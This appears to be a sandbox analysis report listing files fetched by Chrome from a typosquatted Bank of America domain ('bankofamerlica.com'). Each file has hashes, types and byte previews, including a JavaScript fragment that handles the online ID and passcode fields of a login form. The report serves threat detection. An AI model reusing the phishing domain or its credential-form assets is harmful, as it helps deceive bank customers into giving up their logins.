                                                                                              MD5:CDCB0F012C00908030C706B328C6325E
                                                                                              SHA1:40B1D7C103B08787C7E76CCF00A7174938C18CEB
                                                                                              SHA-256:2A1B1589E316D02AB75481E7AA88C9975AFD2E87F17982FB6D38B6EBE2425A4C
                                                                                              SHA-512:F52732746CCEF888E93AA38A6FB80B20DDD21F4100BCDF4CA0D1FEBE593F1BC2ABC4215B359F47CDA7E27B036D6B281669FF469AB1E151AECA1C51CEA98C963D
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/sign-in-sprite.png
                                                                                              Preview:.PNG........IHDR..............+s.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):3220
                                                                                              Entropy (8bit):7.8841671438689325
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:VocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODJ2tN9iyU8/a:VZ/I09Da01l+gmkyTt6Hk8nTJYit8S
                                                                                              MD5:A1874BEC60E4440A4C0D240EF3D0A385
                                                                                              SHA1:51E42F8B4483CFE0107394675E20C51ACB1ADB33
                                                                                              SHA-256:E1AC56AE25629E508F729B799D563D71920902A4CB26CF3BB602BEB3E368775E
                                                                                              SHA-512:616B596626A853F0B61BDEF160056354B54F0D3A43456F3B64C6EE661B556DEEC2D713787580D4694494D303653CE6E557DE3C3B40A7CE59E2527E2558C66256
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR................a....pHYs...........~....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:GIF image data, version 89a, 41 x 40
                                                                                              Category:dropped
                                                                                              Size (bytes):13759
                                                                                              Entropy (8bit):1.4318234044597167
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:W35al1nqyWWuZDv/SADMSRc7ZZlTkISQ3iaN8Y/CTI1gIo85vCxK+rB:W36qwcvLYHZkIvSDY/QIGIo85vCjd
                                                                                              MD5:8D1E7DD5AA9C2AD59E5A581FEE153988
                                                                                              SHA1:1096E9A332A600314700F6A5F53465D75057B02D
                                                                                              SHA-256:62B9E843F3E5B7411BF0EDFE4F118165F95D5CE4EF837E6CF9B12E8BBAD1C425
                                                                                              SHA-512:DF018398F135D4EF4FFC98A2FD19435C0688E9C2F71FBCB5D6B2F55CADE9AFDEC06CECA3819B34079D0DD00B621C685C1A40F8E201ACAD7A35177C113046517D
                                                                                              Malicious:false
                                                                                              Preview:GIF89a).(.........*........??.....&.OO....__.</....9I..1(......@9..............!.!*.L?..QA.22.&,." .I=.;6...................)!.B:.CN............%.95.......1).DO.1!..............................!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.351735, 2008/07/22-18:04:26 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <xmp:CreatorTool>Adobe Fireworks CS4</xmp:CreatorTool>. <xmp:CreateDate>2011-06-17T21:59:29Z</xmp:CreateDate>. <xmp:ModifyDate>2011-06-17T22:00:08Z</xmp:ModifyDate>. </rdf:Description>. <rdf:Description rdf:about="". xmlns:dc="http://purl.org/dc/elements/1.1/">. <dc:format>image/gif</dc:format>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):5172
                                                                                              Entropy (8bit):5.1236427132163636
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:TgajpAgkviN3+BE3gHWA+0ztCUEr5Go+64hvmssgipiQiiiGtlnC8otq3Ss4tJE4:8aWaNOB0g2Az5CYKZXblnC8mq3SsWJE4
                                                                                              MD5:5CCADC09DCD5BFB586F8F02100AD4698
                                                                                              SHA1:0039F005C36CDB0F1330D13C04B9D88B2CE20B7A
                                                                                              SHA-256:C172D0CDB1DF992653B25E033AC6539BA795F9048B6C23630DBEF3B918FF189D
                                                                                              SHA-512:B01FC96E6FA0ED0B91946BE1BE328CBC241DD91D9436976D427A45AF956579C674C3CE96B688BB12B4C2C2480CF449B5CF41920DF7B933E13B60C9AB34952C49
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/special/css/loader.css
                                                                                              Preview:.....loader {.. position: fixed;.. top: 44%;.. right: 0;.. bottom: 0;.. left: 0;.. z-index: 9999;.. margin: 0;.. text-align: center;..}.....loader:before {.. content: "";.. display: block;.. margin: 0 auto 11px;.. text-align: center;.. width: 45px;.. height: 45px;.. border-left: 4px solid #000;.. border-left: 4px solid rgba(0,0,0,.24);.. border-right: 4px solid #000;.. border-right: 4px solid rgba(0,0,0,.24);.. border-bottom: 4px solid #000;.. border-bottom: 4px solid rgba(0,0,0,.24);.. border-top: 4px solid rgb(220, 30, 50);.. border-radius: 51px;.. -webkit-animation: myrotate .75s infinite linear;.. -moz-animation: myrotate .75s infinite linear;.. -o-animation: myrotate .75s infinite linear;.. animation: myrotate .75s infinite linear;.. -webkit-box-sizing: unset;.. -moz-box-sizing: unset;.. box-sizing: unset;..}.....loader:after {.. content: '';.. position: fixed;.. z-index: -1;.. top: 0;.. right: 0;.. bottom: 0;.. left: 0;.. background: #fff;..
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 9 x 135, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):3119
                                                                                              Entropy (8bit):7.88614915155895
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:l/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODWIbhhIs:lSDZ/I09Da01l+gmkyTt6Hk8nTWInIs
                                                                                              MD5:CDCB0F012C00908030C706B328C6325E
                                                                                              SHA1:40B1D7C103B08787C7E76CCF00A7174938C18CEB
                                                                                              SHA-256:2A1B1589E316D02AB75481E7AA88C9975AFD2E87F17982FB6D38B6EBE2425A4C
                                                                                              SHA-512:F52732746CCEF888E93AA38A6FB80B20DDD21F4100BCDF4CA0D1FEBE593F1BC2ABC4215B359F47CDA7E27B036D6B281669FF469AB1E151AECA1C51CEA98C963D
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR..............+s.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:Web Open Font Format, TrueType, length 84472, version 1.0
                                                                                              Category:downloaded
                                                                                              Size (bytes):84472
                                                                                              Entropy (8bit):7.994138546841471
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:38y42v/1ruZl+cFvLiQxvTTMMU3x+zlJvYrqsTTHUkkrMYrSebhurCw:38y42v/l++cz7bYRmsTjUpAYZAWw
                                                                                              MD5:6BE2608379AA1DCEE39359986A09502E
                                                                                              SHA1:A482B47A282E8160628DE2D9CB132F4560F79E04
                                                                                              SHA-256:1172386E1CD9F7FD9D7646DF035D93473BBBF19E1B325FC54D9C2AA76E5A7A80
                                                                                              SHA-512:EDB16B4F9B14394250A31CD6692FC0FCC3BFBD65F4551263140D43F79EB712CC49C82AADDA42D21A69EB12746DB7825C4983100B309EE49888AF023632C1D4C2
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/cnx-regular.woff
                                                                                              Preview:wOFF......I........t........................FFTM............f..GDEF......./...2....GPOS......&......[.GSUB..(....R.....9.GOS/2..-8...T...`.e..cmap..-....)...n1...cvt ..0....F...F....fpgm..1........eS./.gasp..2.............glyf..2.........C..Lhead..0....1...6....hhea..1....!...$.g..hmtx..1,............loca..7,...R...Rh..maxp..<........ ....name..<........a....post..>........1:.`.prep..IL........C";.webf..I..........?Q..........=.......B?t.....C.x.c`d``..b-..`b`a`d.....301.`Z.d/bZ....3..^....x......./....r.g....q..F<....pq.!.."8G=F..R..o..x......x7D^...U....0...K.......... O#.vp.."L...M.t}...a4.{3.~]5.....k..w...9..]..............?.....k.W]:..].........g.g?.}.k.K...0.qy.>...=..{i.m.*..y.Z]..?Z5.............7...!.[......>LW..*...U.......Z5...{.}..#.$.>15~..QY.c.'.{..y...)...!._..w......-+...wa..W:..xU.[JK:.*-/M.n..SE..:.....~..I.o).+-.~Y=.w.......9E.%.w.....t.<.|@yMg.....~..+..A..+...-]V.....b~...eK.m]...XeYe/...G*o.T&......5..&....W..|...U]..6...n.w...
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):3220
                                                                                              Entropy (8bit):7.8841671438689325
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:VocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODJ2tN9iyU8/a:VZ/I09Da01l+gmkyTt6Hk8nTJYit8S
                                                                                              MD5:A1874BEC60E4440A4C0D240EF3D0A385
                                                                                              SHA1:51E42F8B4483CFE0107394675E20C51ACB1ADB33
                                                                                              SHA-256:E1AC56AE25629E508F729B799D563D71920902A4CB26CF3BB602BEB3E368775E
                                                                                              SHA-512:616B596626A853F0B61BDEF160056354B54F0D3A43456F3B64C6EE661B556DEEC2D713787580D4694494D303653CE6E557DE3C3B40A7CE59E2527E2558C66256
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd.png
                                                                                              Preview:.PNG........IHDR................a....pHYs...........~....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 14 x 9, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):144
                                                                                              Entropy (8bit):6.194334305148952
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:yionv//thPlZGl9oT/yBxBrk4nSsSXaHN31vnR6rW0uRTKnwoD0ncs3Tleg1p:6v/lhPCwan8XaHN31vnRUWfuwoCldp
                                                                                              MD5:1F1D3A49189D9FF1E1B99D83E8A36BE5
                                                                                              SHA1:713BFD8A0CC4ACB57D41ED3B82C6E601936018E7
                                                                                              SHA-256:A8BC6337547A246EF75D1AE66D7EC8A0ED6171C1BA49804A403124E27C8E8452
                                                                                              SHA-512:8961B96842DB164136489307823D7E7E067BF79E8214E96719566691BBE603D9C9AE2A50371114E3DB5BAF68848526F4053B1C5BAE8D86C81A1C0B919DE49840
                                                                                              Malicious:false
                                                                                              Preview:.PNG........IHDR..............M.i...WIDAT(S.....0.....J...)2..Uy..8b..#d.V"b.(8.;..x^k...%..t....8mt..9O..5f.ki..+.x._.s.o.P..R......IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:Unicode text, UTF-8 text
                                                                                              Category:downloaded
                                                                                              Size (bytes):52856
                                                                                              Entropy (8bit):5.281617215894529
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:GaDMNO+Tt1uXSV9/Hfm4zJ7GrrttqLtBn:ZDMQqtcXSHHfm4zJ7GrrttqLtBn
                                                                                              MD5:80885AB7DA647489A8ABF9CD2D136892
                                                                                              SHA1:05672041066B540919D39AA526E62DF06A268B21
                                                                                              SHA-256:17CC86E133C15E4524D8EB982186ACD0A06AA8B867F6C178C85A0BDFAE22027B
                                                                                              SHA-512:851CD280086EC021F4007FC24652255A21BA7F57FCA77F11A092DC0CFA9BE58A2BD7D0A43A81049C204F2DF741F462B991A5815B08512FF8D3C5D980A63072FB
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/online-id-vipaa-module-enter-skin.js
                                                                                              Preview:$(function () {... . if ($('.online-id-vipaa-module .enter-skin').length > 0) {.. //Check policy call. //online-id-select for saved oids. var oidselect = $('select#online-id-select');. //online-id-input. var oidinput = $('input#enterID-input');. //passcode input. var pcinput = $('input#tlpvt-passcode-input');. //create hidden field. $('.TL_NPI_Pass').after('<input type="hidden" name="_ib" id="_ib" value="" />');......if(!!captureScriptHashInfo && typeof getScriptTagInfo === 'function') {....getScriptTagInfo().then(function(output){.....$('#EnterOnlineIDForm').append('<input type="hidden" name="_sc" id="_scID" value="'+btoa(JSON.stringify(output))+'" />');....});...}....var failedAttempt = 1;. //detector props. var detectorProps_1 = {. oidkeypress: false,. oidpaste: false,. pckeypress: false,. pcpaste: false,. userAgent: window.navigator.userAgent,.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                              Category:dropped
                                                                                              Size (bytes):1150
                                                                                              Entropy (8bit):3.379628699663185
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:ZInau2e7aRInN5qoHvFCGAaXb3QkDplNez410jjtQk2W56n5n:Zhe9L9CVa3Qz4Ij2
                                                                                              MD5:165D08697E7E0FF31C98209B5195CB2D
                                                                                              SHA1:EC5A74919D139899A1A74FDCFAB9A2087E7FC7CA
                                                                                              SHA-256:1776EC2D36CFE2CAB1AEFFEB1D8D8EB4CCC53014FB6948C8AB46673DF08BD7C0
                                                                                              SHA-512:2C3EB4B366FCE48A9122C0AC5DAD783E04F16C6B87BCE1B54A8129BDFAB0E9C7B92975313C7FF33B3041C2D75370F04D83831C6673C137CB829BBB07D2CF713E
                                                                                              Malicious:false
                                                                                              Preview:............ .h.......(....... ..... .....................................................................................................................................................................................................................................................<...9.......................................................5...7...8...6..=........................................U...8..;....7..S7...7...6...U...................................7..j7...7..3...;...7..7...7...5.."....................i"..i!..f&..6..=7...7...6..Q....8..n7...7...8..7.......i .hi!.da$..i!..i!..j".Y++..6...6...7..7..<....7..s7...6...7..}j+..j"..i"..h!.6h#.Bi ..i!.\....9..(7..7...7...6..YF...8..[6...........d!..i!..g!./++..6..U7..7..y....@...7..a6..3...........................U...7..x8..{9..G8..|7..6.._................................................9..(6..&......................................................................................................................................
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text
                                                                                              Category:downloaded
                                                                                              Size (bytes):226
                                                                                              Entropy (8bit):5.240703953282534
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:JiMVBdgqZj8DHgWdzRiAU2uvxV1kGo3t0CCZiOQg6n:MMHdVBMHgWdzR05kfaZik6
                                                                                              MD5:427CA6B54267934FA7D157357C7BF5A9
                                                                                              SHA1:38E90AD07832DB0174CB60A6B4ACF4172004629E
                                                                                              SHA-256:2A3BB4B7D3BE32F1C3196F7C6C4933973A81C60E055BCC38269118F17F269125
                                                                                              SHA-512:FE8EE5FA8BA08B4CC4CD5F9B499AF0022794D0E52649BB71A72253E4ECCF16E4CE10A716CCC1552ECF42088F03C2C1ECA76F8D5FC7C1462D5E43D24C50CEF752
                                                                                              Malicious:false
                                                                                              URL:https://confirmationonline.blob.core.windows.net/favicon.ico
                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><Error><Code>OutOfRangeInput</Code><Message>One of the request inputs is out of range..RequestId:2e004cc5-301e-0020-117d-679edd000000.Time:2025-01-15T18:41:51.3088717Z</Message></Error>
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):508
                                                                                              Entropy (8bit):7.281914594573599
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:6v/7wYk4HyHyFAouH/gwRugEANRowSUL2Z6qsoBkZKL1:X7F20gCn+6qsoBwKZ
                                                                                              MD5:A747CCF903D04411C91F51BC4B410EDB
                                                                                              SHA1:0E02D69A9AD87D198C5662AED3A9B47C1385B1BD
                                                                                              SHA-256:14ED5F12F40F7FDB602DEBEFBA799D920C1329B17231731387E9D5EF27E457A4
                                                                                              SHA-512:1D128231C58967FDFEB5C660A12594CFE828D5CA4794F7983A5271DA9BD379F9CF58ADE0735B2D5E9C709FEF879DA6C3BB13A70A3EF7DAD8656246D8938903D2
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd-hover.png
                                                                                              Preview:.PNG........IHDR................a....sBIT....|.d.....pHYs............Z....tEXtSoftware.Adobe Fireworks CS6.....vIDAT8...=O.P....#C.a!. nN8:..&......`..n..2:....%1m.$....'>L...00].(^J..g..=.9..^E...l.@Q.`5g...uGv.E.!.<`...y........3.@...4}..3J..'.v.(f...!.F..K..h....J...r......||~.Q...!.j.....N6...V....$.Q..f......u.(%.......|c8.OZ?...l........p4.@....!vN.q;.? &....|.v.A.3..u ..+..N..,...-....D....l..f..;..q9.8J.4.A...K.G.8.^....o.A...X....] .8.z.j.ai..X.L.9#....z...Wa.7.............IEND.B`.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                              Category:downloaded
                                                                                              Size (bytes):1150
                                                                                              Entropy (8bit):3.379628699663185
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:ZInau2e7aRInN5qoHvFCGAaXb3QkDplNez410jjtQk2W56n5n:Zhe9L9CVa3Qz4Ij2
                                                                                              MD5:165D08697E7E0FF31C98209B5195CB2D
                                                                                              SHA1:EC5A74919D139899A1A74FDCFAB9A2087E7FC7CA
                                                                                              SHA-256:1776EC2D36CFE2CAB1AEFFEB1D8D8EB4CCC53014FB6948C8AB46673DF08BD7C0
                                                                                              SHA-512:2C3EB4B366FCE48A9122C0AC5DAD783E04F16C6B87BCE1B54A8129BDFAB0E9C7B92975313C7FF33B3041C2D75370F04D83831C6673C137CB829BBB07D2CF713E
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/favicon.ico
                                                                                              Preview:............ .h.......(....... ..... .....................................................................................................................................................................................................................................................<...9.......................................................5...7...8...6..=........................................U...8..;....7..S7...7...6...U...................................7..j7...7..3...;...7..7...7...5.."....................i"..i!..f&..6..=7...7...6..Q....8..n7...7...8..7.......i .hi!.da$..i!..i!..j".Y++..6...6...7..7..<....7..s7...6...7..}j+..j"..i"..h!.6h#.Bi ..i!.\....9..(7..7...7...6..YF...8..[6...........d!..i!..g!./++..6..U7..7..y....@...7..a6..3...........................U...7..x8..{9..G8..|7..6.._................................................9..(6..&......................................................................................................................................
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 849 x 84, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):71361
                                                                                              Entropy (8bit):7.987946415162672
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:50PshkAyijedj0Y6tbJ/CXc7TEnW6uvrvyNAMP+1Umu9I:If7qoSyXc7TEnY0AMKuG
                                                                                              MD5:8EF07B55C4A1561C9271F57031A51A59
                                                                                              SHA1:5A9DFD0174D1BA6B8784F928C98379F08CD711AF
                                                                                              SHA-256:69D3432300BA1610B3B7B677B5E821630636AAE7F61C01E1058158E69701B2D5
                                                                                              SHA-512:B9FBA6EE1383E7B983045137031AEEE4FE500D78DD9FE84C30E08846F55456A69BA49C13FDB759ED5C6BF9A03FC8AE32101BC761D0DD9BDE4F6BFEDA89F8F623
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/BOA.PNG
                                                                                              Preview:.PNG........IHDR...Q...T.....c.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.}...E..0nV.TrVQ..... .3.%..AD."Q0..AD$K...s...T..{.......uo.3.3.]]]]]g.....(@..P......(@.....s.~./...H...\>...b.V...Ex..!.!.A..gg#7%.YgC..}/.V.F....=..OuAt.'.^...*....!....4....!c.rd.\..-? c.Qd..AnL<..2...u..,.h7.{.....N........f.?.v.....P......(@..P....k@......v.~.<...@..u.Dg.Gt.;/.[..,]..IN@.cHZ..q.F .....0"nl..j.p.R3..k....".\..T..!5.D.-.".....y.>.....!e.Rd~..9.dy...C.../<.?c..J.{^..{....l....Q..P......(@.....|@.K`..i_#NEF...}.....@.n.i..<.$.]..Y. 3"...7#..H.<....".....-.=..Z..Z.).T#..i....CX...*...e[ .Fk.z....Bb.H.8.).?A.....Y'."7!..rr..../~.(/(J....E......(@..P.............._?G....\..!.........N..*...,.....T>...Qf..%$#..)d...i.."........k..-.z]c.\S... .d#D^...W7E.5.S....#.JK..z7....A..b-r....T.1..Y....a.7.&..5..w...(.......(@..P...........s.. .....(.......!/8..[. m.7H\.9.......=...x.g.,.8YJJ_.T.*...l.%$!.T.rv.B..mH_..)3.!q.....b..Bd.'.^.vD\...
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:Unicode text, UTF-8 text
                                                                                              Category:dropped
                                                                                              Size (bytes):52856
                                                                                              Entropy (8bit):5.281617215894529
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:GaDMNO+Tt1uXSV9/Hfm4zJ7GrrttqLtBn:ZDMQqtcXSHHfm4zJ7GrrttqLtBn
                                                                                              MD5:80885AB7DA647489A8ABF9CD2D136892
                                                                                              SHA1:05672041066B540919D39AA526E62DF06A268B21
                                                                                              SHA-256:17CC86E133C15E4524D8EB982186ACD0A06AA8B867F6C178C85A0BDFAE22027B
                                                                                              SHA-512:851CD280086EC021F4007FC24652255A21BA7F57FCA77F11A092DC0CFA9BE58A2BD7D0A43A81049C204F2DF741F462B991A5815B08512FF8D3C5D980A63072FB
                                                                                              Malicious:false
                                                                                              Preview:$(function () {... . if ($('.online-id-vipaa-module .enter-skin').length > 0) {.. //Check policy call. //online-id-select for saved oids. var oidselect = $('select#online-id-select');. //online-id-input. var oidinput = $('input#enterID-input');. //passcode input. var pcinput = $('input#tlpvt-passcode-input');. //create hidden field. $('.TL_NPI_Pass').after('<input type="hidden" name="_ib" id="_ib" value="" />');......if(!!captureScriptHashInfo && typeof getScriptTagInfo === 'function') {....getScriptTagInfo().then(function(output){.....$('#EnterOnlineIDForm').append('<input type="hidden" name="_sc" id="_scID" value="'+btoa(JSON.stringify(output))+'" />');....});...}....var failedAttempt = 1;. //detector props. var detectorProps_1 = {. oidkeypress: false,. oidpaste: false,. pckeypress: false,. pcpaste: false,. userAgent: window.navigator.userAgent,.
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:ASCII text, with very long lines (966), with CRLF line terminators
                                                                                              Category:downloaded
                                                                                              Size (bytes):116404
                                                                                              Entropy (8bit):5.009412268022124
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:KmOM2O7r5ONoi6crPESvD8sskSP0MGEAHagPqNwmcXkd:F
                                                                                              MD5:D259D2D1230AD0ED0EFAB8D1C4118E01
                                                                                              SHA1:E1CE5E6981C98B87E03891CF04031C7742FEF346
                                                                                              SHA-256:B0AC14A2F27F34851C84A888F2D4CCB12CF91D1BEAC3EC95FFC102C61699E2F2
                                                                                              SHA-512:D6586DD57AFD99F10F3ECC1436A79EA7239281012F7E7546D89DAE86B1259A44B178065D2725AAF9B5F056B263FC5EE6FDDA84F56253221F7EC619CBDB1EA92B
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/onetrust-style.css
                                                                                              Preview:.#onetrust-banner-sdk {....-ms-text-size-adjust: 100%;....-webkit-text-size-adjust: 100%...}......#onetrust-banner-sdk .onetrust-vendors-list-handler {....cursor: pointer;....color: #1f96db;....font-size: inherit;....font-weight: bold;....text-decoration: none;....margin-left: 5px...}......#onetrust-banner-sdk .onetrust-vendors-list-handler:hover {....color: #1f96db...}......#onetrust-banner-sdk:focus {....outline: 2px solid #000;....outline-offset: -2px...}......#onetrust-banner-sdk a:focus {....outline: 2px solid #000...}......#onetrust-banner-sdk #onetrust-accept-btn-handler,...#onetrust-banner-sdk #onetrust-reject-all-handler,...#onetrust-banner-sdk #onetrust-pc-btn-handler {....outline-offset: 1px...}......#onetrust-banner-sdk.ot-bnr-w-logo .ot-bnr-logo {....height: 64px;....width: 64px...}......#onetrust-banner-sdk .ot-tcf2-vendor-count.ot-text-bold {....font-weight: bold...}......#onetrust-banner-sdk .ot-close-icon,...#onetrust-pc-sdk .ot-close-icon,...#ot-sync-ntfy .ot-close-ic
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 849 x 84, 8-bit/color RGBA, non-interlaced
                                                                                              Category:dropped
                                                                                              Size (bytes):71361
                                                                                              Entropy (8bit):7.987946415162672
                                                                                              Encrypted:false
